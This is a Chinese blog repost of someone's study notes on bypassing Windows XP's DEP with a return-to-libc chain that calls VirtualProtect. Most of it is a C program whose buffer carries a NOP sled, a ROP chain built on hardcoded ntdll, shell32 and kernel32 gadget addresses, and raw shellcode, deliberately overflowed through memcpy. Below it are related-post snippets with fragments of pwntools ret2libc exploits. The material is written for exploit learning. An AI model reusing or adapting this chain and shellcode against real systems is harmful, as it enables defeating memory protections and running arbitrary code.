Ret2libc 利用 VitualProtect

最新推荐文章于 2023-05-08 00:34:22 发布
最新推荐文章于 2023-05-08 00:34:22 发布
阅读量143 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/zcc1414/p/3982386.html
版权

DEP 概念

首先   WINDOWS 2003  是默认开启DEP的  一般都拿2003来做试验

今天我用  XP  开启DEP 做实验  一回事

·······················································

只是学习笔记·····································另外的方法:

Ret2libc  NtSetInformationProcess  去关闭DEP

BOOL VirtualProtect(
LPVOID lpAddress, // 目标地址起始位置     *shellcode所在内存空间起始地址
DWORD dwSize, // 大小                     *shellcode大小
DWORD flNewProtect, // 请求的保护方式     *0x40 PAGE_EXECUTE_READWRITE
PDWORD lpflOldProtect // 保存老的保护方式 *某个可写地址
);
成功返回非0  修改失败返回0


先总结:

首先  一般都是覆盖  返回地址,因为 软 DEP  也就是 SAFESEH  那么要用  可执行的模块!!!!!!!

!searchcode jmp esp   可以显示  模块属性          DEP寻找特殊代码时要用!!!!!!!!!!!!!!!


书上的例子  是覆盖返回地址  然后  溢出漏洞函数 从 strcpy 改为  memcpy 函数 ,因为它对 "\x00"不截断


#include "stdafx.h"
#include <windows.h>

char shellcode[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

// PS 这种方法不能用OD插件快速找到地址,可用 !searchcode jmp esp
//7C80997D    58              pop eax ret 
"\x7d\x99\x80\x7c"

//地址=7C92E7D9
//消息=Found:POP ESI POP EBX POP EDI  RETN at 0x7c92e7d9     Module:  C:\WINDOWS\system32\ntdll.dll
"\xd9\xe7\x92\x7c"//这里不能修改 ESP,EBP,EAX

//地址=7D760702
//消息=Found:PUSH ESP POP EBP RET 4 at 0x7d760702     Module:  C:\WINDOWS\system32\shell32.dll
"\x02\x07\x76\x7d"

//7C92120F    C3          retn
"\x0f\x12\x92\x7c"

"\x90\x90\x90\x90"

"\xc6\xc6\xeb\x77"//77EBC6C6   push esp jmp esp

"\xff\x00\x00\x00"  //修改内存大小
"\x40\x00\x00\x00"  //可读写执行内存属性代码

"\xc6\xc6\xeb\x77"//77EBC6C6   push esp jmp eax

"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
/*
7C801AD9    FF75 14         push dword ptr ss:[ebp+0x14]
7C801ADC    FF75 10         push dword ptr ss:[ebp+0x10]
7C801ADF    FF75 0C         push dword ptr ss:[ebp+0xC]
7C801AE2    FF75 08         push dword ptr ss:[ebp+0x8]
7C801AE5    6A FF           push -0x1
7C801AE7    E8 75FFFFFF     call kernel32.VirtualProtectEx */
"\xd9\x1a\x80\x7c"

"\x90\x90\x90\x90"

//7C8369F0    FFD4            call esp
"\xf0\x69\x83\x7c"


"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"

//shellcode:
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53"
"\x68\x64\x61\x30\x23"
"\x68\x23\x50\x61\x6E"
"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8";//168
;
void test()
{
	char str[176];
	memcpy(str,shellcode,420);
}
int main(int argc, char* argv[])
{
	HINSTANCE hTnst = LoadLibrary("shell32.dll");
	char temp[200];
	test();
	return 0;
}

这种方法不好用啊  看看能不能突破······························因为strcpy要截断字符



























转载于:https://www.cnblogs.com/zcc1414/p/3982386.html

weixin_30790841
关注
利用Ret2Libc挑战DEP之二——利用VirtualProtect
Yx0051的博客
08-14 896
感觉最近作者给出的shellcode,有一种“他就是这样”、“这样的shellcode是最合理”的感觉了。刚开始看有点看不懂,但是跟着最终实现代码一点点跟,就会发现这个代码的巧妙之处。 0x01 环境 系统:Windows 2003 SP2 编译器:VS2008 注意编译选项: release版本 禁用优化(C++——optimization disable) GS禁用(C++——c
ret2libc
huzai9527的博客
02-03 490
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
0day2 挑战DEP,ret2libc利用VirtualProtect详细实现
weixin_45612751的博客
11-03 260
0day2 挑战DEP,ret2libc利用VirtualProtect详细实现 本文参考于 0day安全:软件漏洞分析技术(第2版) 此方法是利用ret2libc来改变内存属性,使栈空间可以执行命令 实验环境 windows xp sp3,vc6.0,仅开启dep,OD调试器; 代码如下: // GS_Virtual.cpp : 定义控制台应用程序的入口点。 // #include <stdlib.h> #include <string.h> #include <stdi
Ret2Libc 练习(2) -- VirtualProtect
weixin_30700977的博客
09-27 195
  这几天做了NSCTF和GCTF,耽误了几天,今天继续。   这次绕过DEP的方法是利用VirtualProtect函数将shellcode所在的内存属性改成可执行状态就可以绕过DEP了。   首先看一下VirtualProtect函数的参数说明:      lpAddress: 改变属性的内存起始起止   dwSize: 要改变属性的内存的起始地址   flNewProtect: ...
DEP: Ret2Libc via VirtualProtect()
ShadowAssassin的专栏
01-05 1059
VirtualProtect() 绕过DEP 文章参考 0day 安全:软件漏洞分析技术: 学习了DEP 绕过技术中的 VirtualProtect()绕过DEP,不过书中的例子是以windows 2003 为例,通过学习,一步一步在xp上测试成功。 BOOL VirtualProtect{ LPVOID lpAddress, // 需要修改属性的内存的起始地址
内存保护机制及绕过方法——利用Ret2Libc绕过DEP之VirtualProtect函数
weixin_30549175的博客
05-14 880
利用Ret2Libc绕过DEP之VirtualProtect函数 ⑴. 原理分析: i.相关概念: VirtualProtect()函数: BOOL WINAPI VirtualProtect( _In_ LPVOID lpAddress, //目标地址的起始位置 _In_ SIZE_T dwSize, //区域大小 _In_ DWORD flN...
ret2libc2pwn 入门题
02-11
pwn 入门题
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8378
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
ret2libc3
m0_49959202的博客
08-06 421
文章目录ret2libc31.程序分析2.栈帧设计3.exp编写 ret2libc3 当前的ret2libc3:无system,无”\bin\sh“ 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现没有开启pie ida分析程序: 发现有个See_something()函数可以用来泄露具体给定地址内的信息: main函数内还有个Print_message(),可以用来栈溢出: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SKJoX7
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
Ret2libc 1
weixin_44864859的博客
05-19 742
Ret2libc 1 题目代码和之前一样,gets函数存在栈溢出。同时也存在system函数,但是不同之处是我们不能直接跳转到system(“shell!?”)。因为我们要执行的是system(“bin/sh”)。 首先,我们可以在内存中搜索一下看有没有这个字符串 我们可以看到在0x8049720存在我们需要的字符串 那么,我们直接返回该处,即执行 system 函数。相应的 payload 如下 from pwn import * sh = process('./ret2libc1') binsh_
Ret2libc
iextract的博客
04-24 679
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
ret2libc1
m0_49959202的博客
08-06 313
文章目录ret2libc11.简单机制介绍2.程序分析3.exp编写 ret2libc1 1.简单机制介绍 ret2libc即控制程序执行libc中的函数,一般是返回至某个plt处或者函数的具体的位置(比如got表项的内容)。一般,我们选择跳转到system("/bin/sh")位置,从而获取shell。当程序调用某个函数时,程序会去plt表内查找,plt表再去got内查找,如果got内存在那么直接返回;如果不存在那么就调用查找函数搜寻需要用到的函数,然后存入got表内。 当前的ret2libc1:有sy
【PWN · ret2libc】ret2libc1
最新发布
Mr_Fmnwon的博客
05-08 1585
当函数运行到调用库函数时,程序将访问对应函数的plt表项,plt表项存着代码,代码分为两部分:第一部分,跳转到对应的got表。第二部分,查找函数的真实地址,修改got表内容。 got表项存着一个地址。然而这个地址并不一开始就是libc中函数的真实地址。 一开始,got表项中地址指向plt代码的第二部分。后来,因运行plt第二部分代码段,got表内容被修改为真实函数地址。依据以上,我们可以......分享几个实用的干货小技巧,不用IDA解决此题
PWN —— ret2libc1
qq_41696518的博客
07-03 469
ret2libc1
Ret2Libc(1) (有system、/bin/sh)绕过NX、ASLR
X丶 的博客
11-21 1145
Ret2Libc即控制程序执行libc库中的函数。 通常是返回到某个函数的plt处,或者函数运行时候的实际地址。 下面是一个例子: 可以看出程序gets有一个明显的溢出漏洞 gdb-peda$ checksec CANARY    : disabled FORTIFY   : disabled NX        : ENABLED PIE       : disabled RELRO...
深入理解ret2libc攻击:无壳代码控制
在IT安全领域,"Performing a ret2libc Attack-InVoLuNTaRy" 是一篇关于高级攻击技术的教程,主要讲解如何利用ret2libc(Return to Library Call)漏洞进行攻击。ret2libc是一种针对栈溢出漏洞的利用方法,它让攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值